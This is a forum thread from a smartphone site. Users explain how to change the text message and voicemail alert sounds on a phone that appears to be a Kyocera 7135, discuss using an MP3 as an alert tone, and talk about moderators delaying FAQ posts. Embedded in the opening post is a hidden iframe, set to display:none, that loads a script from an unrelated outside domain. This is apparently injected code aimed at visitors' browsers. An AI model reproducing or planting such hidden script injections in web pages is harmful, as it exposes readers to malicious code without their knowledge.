+ Reply to Thread

Text message sound?

Was wondering - Is there a way to change the sound on a text message when recieved? It seems, that I can not here them when they come in, and sometimes it is important that I hear it right away. Any suggestions welcomed.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

In the Messages application, go to the Settings menu and select Incoming Messages. You can then select loud or soft beep volume and you can choose between having it beep just once upon receipt or to also beep every five minutes after that.

You can do the same thing for Voice Mail alerts.

Yes -- I posted a FAQ about this very issue minutes ago -- You will have to wait for the moderators to release the post though.

If you want it faster, PM the mods to get off thier duffs! hehe
    iPhone therefore iAm.

Originally posted by JimONeill
    In the Messages application, go to the Settings menu and select Incoming Messages. You can then select loud or soft beep volume and you can choose between having it beep just once upon receipt or to also beep every five minutes after that.

You can do the same thing for Voice Mail alerts.
    Is there a way to use an MP3 for text message arrivals ??? I would love to use that Monty Python movie "Holy Grail" sound of the arrow flying through the air and the character saying "Message for you, Sir" as he starts to fall over. Funny!
    Michael

Originally posted by Steve
    Yes -- I posted a FAQ about this very issue minutes ago -- You will have to wait for the moderators to release the post though.

If you want it faster, PM the mods to get off thier duffs! hehe
    lol... I'm a mod and I can't even get to it! (and I wanted to read it!). Maybe I didn't go to the right place to look at it...
    Please visit my picture site: Robert-O-Rama :)

Thanks - you guys are great!
    Michael - great idea rol!!

Originally posted by Michael Rye
    Is there a way to use an MP3 for text message arrivals ??? I would love to use that Monty Python movie "Holy Grail" sound of the arrow flying through the air and the character saying "Message for you, Sir" as he starts to fall over. Funny!
    Yes -- Its not as easy as a dropdown like the flip sounds & but it can be done -- Give the mods time to release it and I will post the Monty python file into the same thread. (hmm when are they going to make me a mod? then you guys wouldn't be waiting! )
    iPhone therefore iAm.

Yes -- Its not as easy as a dropdown like the flip sounds & but it can be done -- Give the mods time to release it and I will post the Monty python file into the same thread. (hmm when are they going to make me a mod? then you guys wouldn't be waiting! )
    Are you sure you posted that right? I have never had to wait for a mod to approve anything I submitted to the FAQ forums. Or is this something new?

Alan

Originally posted by alanb
    Are you sure you posted that right? I have never had to wait for a mod to approve anything I submitted to the FAQ forums. Or is this something new?

Alan
    I'm sure I did it right - I even attached the mp3 I used as an example.....

Looks like the have been resticting it since 2/28:

http://www.smartphonesource.com/vbul...&threadid=6128

Once you have composed your FAQ, it will go to a moderators queue where it will be reviewed and released to the forum as a post.
    iPhone therefore iAm.

Originally posted by alanb

Alan
    It's pretty recent... as a matter of fact I think it was your FAQ's that prompted the discussion about the need for "quality control" :p (just kidding! )

Robet K just PM'd me and is working on releasing it right now
    iPhone therefore iAm.

p.s. The real reason why it was decided to moderate FAQ was because of how cluttered the 6035 FAQ forum got from people posting threads that weren't really "FAQ's".

I'm sure I did it right - I even attached the mp3 I used as an example.....

Looks like the have been resticting it since 2/28:

http://www.smartphonesource.com/vbul...&threadid=6128
    Must have missed that one. Thanks.

Alan

RK,

You seem to be one of the most active mods (or the one with the most time on his hands!), so maybe you could tell me why some of the 7135 FAQs disappeared. I distinctly remember one about how to cut down on battery usage.

OK on Roberts suggestion I am going to Re-post my FAQ to the discussion Area-- It will look the same as the one in the FAQ (when its released)

http://www.smartphonesource.com/vbul...&threadid=6791
    iPhone therefore iAm.

Originally posted by KLiuLess
    RK,

You seem to be one of the most active mods (or the one with the most time on his hands!), so maybe you could tell me why some of the 7135 FAQs disappeared. I distinctly remember one about how to cut down on battery usage.
    I believe that the reason that they have "disappeared" is because the default for the FAQ forum is threads updated during the last 30 days.... and of course some of the most valuable FAQ's were created back in December-February. Just change the time period down at the bottom of the FAQ forum page. I have brought this to jazz & jj's attention, and I believe that they are looking into this.

Ooh! I can't believe I missed that.
    I guess that's why you're a mod!

Originally posted by KLiuLess
    Ooh! I can't believe I missed that.
    I guess that's why you're a mod!
    lol... you're not the only one though. It took me a minute to figure it out when I was preparing for the arrival of my 7135 and went to the FAQ forum to gather all of the info I would need, and they were all gone! :p

I realize this is an older post, but I just got a 7135 and would like to know just how to use an MP3 as a voice mail (or SMS) alert. I don't see any directions in here, or am I overlooking something obvious? TIA.

Never mind, justfigured out I was overlooking something obvious.